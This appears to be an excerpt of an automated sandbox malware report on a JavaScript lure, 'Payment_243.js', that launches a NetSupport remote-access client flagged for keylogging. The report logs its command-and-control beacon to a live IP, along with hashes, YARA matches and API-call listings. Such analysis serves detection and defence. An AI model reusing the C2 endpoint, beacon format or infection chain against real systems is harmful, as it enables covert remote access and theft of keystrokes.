Jan 14, 2025 16:21:08.602596045 CET	224	IN	Data Raw: 31 74 e1 73 b4 c3 f1 57 31 08 45 79 fc 86 1f 29 91 08 e9 c7 a0 ae aa bb 9f bb 10 2a 2f 69 2b 72 bc d7 77 29 77 ee f0 98 44 e8 d6 c5 86 87 8d e9 cd 6e 6a 2a 77 64 8a 9d c0 60 1a ed ab 36 9e b9 9f 3b d5 4f 74 14 45 f1 ac 3c 04 82 06 4a a8 00 6c 09 Data Ascii: 1tsW1Ey)/i+rw)wDnjwd`6;OtE<Jl+sR&MxOavSGK##K>l*D]!X@y`3K];[.0r4p#K35eu6Ml0UZzPDL?@od
Jan 14, 2025 16:21:08.602715015 CET	1236	IN	Data Raw: 4d a1 75 dd 48 26 01 d8 4b 76 f3 63 b3 79 c2 92 71 0b 35 46 d3 d4 c1 51 98 3f a5 bd fa 9e 45 7e b6 45 72 06 12 58 4a 7d 15 22 18 fc 3f d8 05 02 e9 26 3d a3 f5 da 35 f0 a7 7a 07 60 e9 0d 0e e4 d6 ad 0a c1 9d d2 d8 31 52 6b 39 a9 10 6a dd cb f7 f1 Data Ascii: MuH&Kvcyq5FQ?E~ErXJ}"?&=5z`1Rk9jf9E93p;odzX\ .cxFqw94q%0393>fe4'+}HXNPo?a0<E2lTh?:m^xeB&V1AS%.-.
Jan 14, 2025 16:21:08.602725029 CET	224	IN	Data Raw: 82 43 ab 0f fa 38 f1 f5 be 7c 0f 71 10 55 10 3f 6a 1f 2c 3a 39 c4 a1 80 1f b9 ec 17 c8 1d 4d 3e ed 0e fa bb 35 cf 41 f4 06 6c 42 42 ff 05 5b e5 6d 05 e7 fa 2b 24 42 8f 36 61 53 c7 54 ae 44 86 06 bb 44 56 3b f4 17 8b af 2d be 49 88 35 c4 3c 45 de Data Ascii: C8\|qU?j,:9M>5AlBB[m+$B6aSTDDV;-I5<EA#2\|O2>Q1r$t4vI6?o@e3F;z `e4j=,?Z=j,Tpf@TU'>h
Jan 14, 2025 16:21:08.607434988 CET	1236	IN	Data Raw: fc 5a ce 9e 41 83 92 8c 78 23 d9 cd 83 9c ab 63 2d 87 5d 71 e2 a9 ed 9b bf 19 5b 06 0b 7f 4f 85 ff 1d fa 3b 94 62 77 dc 0f b2 25 d9 00 be 74 41 5b d7 3c d0 5d aa 9c 88 7a 78 86 e0 24 e7 f2 b2 97 96 0e 02 d4 60 99 b4 8f ad dc de 39 c6 f4 1c e9 23 Data Ascii: ZAx#c-]q[O;bw%tA[<]zx$`9#Yf1[i#r9HZk;g~ng+M^w3CZ`n3,=Lgr+wH#IPmpd%B\|G-0:a9x~ig\{PrN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49166	185.157.213.71	443	3748	C:\ProgramData\x225qa0\client32.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 16:21:17.443648100 CET	220	OUT	POST http://185.157.213.71/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 185.157.213.71Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49167	104.26.0.231	80	3748	C:\ProgramData\x225qa0\client32.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 16:21:18.469197035 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Jan 14, 2025 16:21:19.191450119 CET	1123	IN	HTTP/1.1 404 Not Found Date: Tue, 14 Jan 2025 15:21:19 GMT Content-Type: text/html; charset=us-ascii Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 901e9d7529d1c988-IAD CF-Cache-Status: DYNAMIC cf-apo-via: origin,host Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gc3oIBvBtUgM8YAwbRN48w5AsnTbnCGPG4HIQT2ZB6J88m7vBx2lZz2S2l%2BsemwJa2rW0KJwidk18w5jAANvtDPuVpiETPEm4TD0tqhBVYG%2BwMN9jSkP85%2BAMInOnFYS7d7Zi5r4PtBHFeCd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=8080&min_rtt=8080&rtt_var=4040&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49168	104.26.0.231	80	3748	C:\ProgramData\x225qa0\client32.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 16:21:19.581892967 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Jan 14, 2025 16:21:20.263068914 CET	802	IN	HTTP/1.1 404 Not Found Date: Tue, 14 Jan 2025 15:21:20 GMT Content-Type: text/html; charset=us-ascii Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 901e9d7bedff0f37-EWR CF-Cache-Status: DYNAMIC cf-apo-via: origin,host Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kv9TaLead1UM8xuCNbW5bbNocBjfRxR77Xi1neXV%2FjpNe6%2FpYbFfDPPkOJzct6zd%2FEhAt%2Fm%2FoRe3OIbFNrrYb9Dv7JMdUVy9Sq4tNVR2%2FGE8XIqWXIX7fXyei70qyxJmBXBhkM1TPoBC5NpR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1482&rtt_var=741&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49169	104.26.0.231	80	3748	C:\ProgramData\x225qa0\client32.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 16:21:20.269292116 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Jan 14, 2025 16:21:20.958117962 CET	1129	IN	HTTP/1.1 404 Not Found Date: Tue, 14 Jan 2025 15:21:20 GMT Content-Type: text/html; charset=us-ascii Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 901e9d804f440c92-EWR CF-Cache-Status: DYNAMIC cf-apo-via: origin,host Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3SEZmome8uga32gP%2FZMtXcxpGi%2BtdRASRvM4EkIhhWM%2FwtTuCdV3BPbNrHTGnDFM26lQ2%2FNTNhwt56JEbpbT4xQGDGmlikULEjJMaPDiEbmpk6NnNSw%2FKJWQdpQXzWszGDHhAZs6fqvrFOK%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1528&rtt_var=764&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0

Target ID:	0
Start time:	10:20:16
Start date:	14/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js"
Imagebase:	0xff4e0000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:21:14
Start date:	14/01/2025
Path:	C:\ProgramData\x225qa0\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\x225qa0\client32.exe"
Imagebase:	0xaa0000
File size:	103'824 bytes
MD5 hash:	C4F1B50E3111D29774F7525039FF7086
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.670588209.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000000.516821762.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.670615184.000000000201E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\x225qa0\client32.exe, Author: Joe Security
Antivirus matches:	Detection: 32%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	10:21:20
Start date:	14/01/2025
Path:	C:\ProgramData\x225qa0\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\x225qa0\client32.exe"
Imagebase:	0xaa0000
File size:	103'824 bytes
MD5 hash:	C4F1B50E3111D29774F7525039FF7086
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000000.529790878.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.530048197.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:21:28
Start date:	14/01/2025
Path:	C:\ProgramData\x225qa0\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\x225qa0\client32.exe"
Imagebase:	0xaa0000
File size:	103'824 bytes
MD5 hash:	C4F1B50E3111D29774F7525039FF7086
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.547582545.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000000.547201521.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	126

Executed Functions

Function 1109E5B0 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501
filethreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,B24479DC,00080000,00000000,?), ref: 1109D88D
Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9

LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,B24479DC,00080000,00000000,?), ref: 1109E645
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
GetVersionExA.KERNEL32(?), ref: 1109E680
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
CreateFileMappingA.KERNEL32 ref: 1109E750
GetLastError.KERNEL32 ref: 1109E75D
LocalFree.KERNEL32(?), ref: 1109E786
LocalFree.KERNEL32(?), ref: 1109E793
GetLastError.KERNEL32 ref: 1109E7B0
MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
LocalFree.KERNEL32(?), ref: 1109E7F9
LocalFree.KERNEL32(?), ref: 1109E806

Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 1109D7D8

Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA,00000000,?,1109E6BC,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D824

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
LocalFree.KERNEL32(?), ref: 1109E8FB
LocalFree.KERNEL32(?), ref: 1109E908
_memset.LIBCMT ref: 1109E920
GetTickCount.KERNEL32 ref: 1109E928
GetCurrentProcessId.KERNEL32 ref: 1109E9D4
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
GetLastError.KERNEL32 ref: 1109EA44
GetLastError.KERNEL32(00000000), ref: 1109EA4B
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
GetLastError.KERNEL32 ref: 1109EA89
GetLastError.KERNEL32(00000000), ref: 1109EA90
CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
GetLastError.KERNEL32 ref: 1109EACF
GetLastError.KERNEL32(00000000), ref: 1109EAD6
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
GetLastError.KERNEL32 ref: 1109EB1A
GetLastError.KERNEL32(00000000), ref: 1109EB1D
LocalFree.KERNEL32(?), ref: 1109EB45
LocalFree.KERNEL32(?), ref: 1109EB52
GetCurrentThreadId.KERNEL32 ref: 1109EB83
CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
ResetEvent.KERNEL32(?), ref: 1109EBCC
ResetEvent.KERNEL32(?), ref: 1109EBD2
ResetEvent.KERNEL32(?), ref: 1109EBD8
SetEvent.KERNEL32(?), ref: 1109EBDE

Strings

Error cant map view, xrefs: 1109E7DB
cant create filemap, xrefs: 1109E795
Error filemap exists, xrefs: 1109E8DD
cant map, xrefs: 1109E808
cant create thread, xrefs: 1109EBAA
cant create events, xrefs: 1109EC14
warning map exists, xrefs: 1109E8B0
IPC(%s) created, xrefs: 1109EBE8
SeSecurityPrivilege, xrefs: 1109E61A
Info - reusing existing filemap, xrefs: 1109E899
Cant create event %s, e=%d (x%x), xrefs: 1109EA59, 1109EA9E, 1109EAE4, 1109EB27
Error cant create events, xrefs: 1109EC07
map exists, xrefs: 1109E90A
S:(ML;;NW;;;LW), xrefs: 1109E6A8
Error creating filemap (%d), xrefs: 1109E764

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
API String ID: 3291243470-2792520954
Opcode ID: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
Instruction ID: a3fd055aacadca8d823d44ca49761fd5d24e706f53ed4dbc48f97bf713fa71f6
Opcode Fuzzy Hash: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
Instruction Fuzzy Hash: A612B2B5E0026D9FEB24DF60CDD4EAAB7BAFB88304F0049A9E51D97640D671AD84CF50

Function 11029BB0 Relevance: 93.3, APIs: 41, Strings: 12, Instructions: 534
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(WinInet.dll), ref: 11029BE5
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
InternetCloseHandle.WININET(000000FF), ref: 11029C8D
SetLastError.KERNEL32(00000078), ref: 11029C93
_malloc.LIBCMT ref: 11029CB7
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
GetLastError.KERNEL32 ref: 11029CF2
_free.LIBCMT ref: 11029CFE
_malloc.LIBCMT ref: 11029D07
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
SetLastError.KERNEL32(00000078), ref: 11029D84
SetLastError.KERNEL32(00000078), ref: 11029D91
SetLastError.KERNEL32(00000078), ref: 11029D9B
_free.LIBCMT ref: 11029DA5

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
SetLastError.KERNEL32(00000078), ref: 11029E3E
GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
SetLastError.KERNEL32(00000078), ref: 11029EA3
GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
HttpOpenRequestA.WININET(?,GET,1119A6D8,00000000,00000000,00000000,8040F000,00000000), ref: 11029EEF
GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
GetProcAddress.KERNEL32(?,InternetQueryDataAvailable,?), ref: 1102A083
SetLastError.KERNEL32(00000078), ref: 1102A150
GetProcAddress.KERNEL32(?,InternetCloseHandle,?,1117FC4B), ref: 1102A1A2
SetLastError.KERNEL32(00000078), ref: 1102A1B9
FreeLibrary.KERNEL32(?), ref: 1102A1CA

Strings

InternetCloseHandle, xrefs: 11029C79, 11029E1F, 11029E84, 1102A19C
InternetConnectA, xrefs: 11029E4B
InternetQueryOptionA, xrefs: 11029CCB, 11029D1B
WinInet.dll, xrefs: 11029BDD
InternetOpenA, xrefs: 11029D55
://, xrefs: 11029DC5
HttpSendRequestA, xrefs: 11029F17
GET, xrefs: 11029EE9
InternetErrorDlg, xrefs: 11029FC0
HttpOpenRequestA, xrefs: 11029EC3
InternetQueryDataAvailable, xrefs: 1102A07D
HttpQueryInfoA, xrefs: 11029F63

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Internet$FreeLibraryOpen_free_malloc$CloseConnectHandleHeapHttpLoadRequest
String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
API String ID: 2589145992-913974648
Opcode ID: cfef3842b7233c639300b4b3baa36030b4a6cf3fe6308119353442e5a9ff000f
Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
Opcode Fuzzy Hash: cfef3842b7233c639300b4b3baa36030b4a6cf3fe6308119353442e5a9ff000f
Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60

Function 1111C990 Relevance: 79.4, APIs: 23, Strings: 22, Instructions: 634COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C,?,00000000,?,1104C49F), ref: 1111C9E2
SystemParametersInfoA.USER32(00000025,00000000,00000000,00000000), ref: 1111C9F8
SystemParametersInfoA.USER32(00000026,00000000,0201E230,00000000), ref: 1111CA0A
SystemParametersInfoA.USER32(00000049,00000008,00000008,00000000), ref: 1111CA60
SystemParametersInfoA.USER32(00000048,00000008,00000008,00000000), ref: 1111CA75
SystemParametersInfoA.USER32(00001002,00000000,0201E240,00000000), ref: 1111CAD9
SystemParametersInfoA.USER32(00001005,00000000,00000000,00000000), ref: 1111CB1F
SystemParametersInfoA.USER32(00001004,00000000,0201E238,00000000), ref: 1111CB37
SystemParametersInfoA.USER32(00001007,00000000,00000000,00000000), ref: 1111CB7D
SystemParametersInfoA.USER32(00001006,00000000,0201E23C,00000000), ref: 1111CB95
SystemParametersInfoA.USER32(0000101B,00000000,00000000,00000000), ref: 1111CBDB
SystemParametersInfoA.USER32(0000101A,00000000,0201E244,00000000), ref: 1111CBF3
SystemParametersInfoA.USER32(00001015,00000000,00000000,00000000), ref: 1111CC39
SystemParametersInfoA.USER32(00001014,00000000,0201E248,00000000), ref: 1111CC51
